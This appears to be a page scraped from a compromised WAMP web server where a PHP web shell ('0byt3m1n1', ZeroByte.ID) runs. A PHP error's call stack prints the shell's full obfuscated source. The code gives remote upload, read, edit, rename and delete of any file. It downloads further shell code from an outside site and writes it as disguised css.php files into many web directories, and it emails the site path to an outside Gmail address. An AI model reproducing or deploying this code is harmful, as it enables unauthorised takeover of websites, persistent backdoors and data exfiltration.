0byt3m1n1
Path:
C:
/
wamp64
/
apps
/
phpmyadmin4.9.2
/
sql
/
[
Home
]
File: upgrade_tables_4_7_0 .sql
( ! )
Warning: file_get_contents(C:/wamp64/apps/phpmyadmin4.9.2/sql/upgrade_tables_4_7_0 .sql): failed to open stream: No such file or directory in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line
34
Call Stack
#
Time
Memory
Function
Location
1
0.0001
406768
{main}( )
...\mr1.php
:
0
2
0.0002
409312
eval(
'$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;'
)
...\mr1.php
:
2
3
0.0015
521816
eval(
'?>
0byt3m1n1
0byt3m1n1
'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "
Path: "; foreach($paths as $id => $pat) {echo "
$pat
/";} echo '
[
Home
]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.
';} else{echo '
Upload Failed!.
';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '
';echo("
".htmlspecialchars(file_get_contents($_GET['filesrc']))."
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '
'.$_POST['path'].'
'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!
'; }else{ echo '
Rename Failed!
'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.
'; }else{echo '
Edit File Failed!.
';}fclose($fp);} echo '
'.htmlspecialchars(file_get_contents($_POST['path'])).'
';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!
'; }else{echo '
Delete Dir Failed!
';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo '
Delete File Done.
';}else{ echo '
Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
Name
Size
Permissions
Last Update
Options
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "
[D]
$dir
--
"; if(is_writable("$path/$dir")) echo '
'; elseif(!is_readable("$path/$dir")) echo '
'; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '
'; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
Delete
Rename
";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "
[F]
$file
".$size."
"; if(is_writable("$path/$file")) echo '
'; elseif(!is_readable("$path/$file")) echo '
'; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '
'; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
Delete
Rename
Edit
";} echo '
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 -
ZeroByte.ID
.
';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check.""; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check.""; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check.""; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2.""; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check.""; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot
\n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>' )
...\mr1.php(2) : eval()'d code
:
1
4
0.0098
523664
file_get_contents
( )
...\mr1.php(2) : eval()'d code(1) : eval()'d code
:
34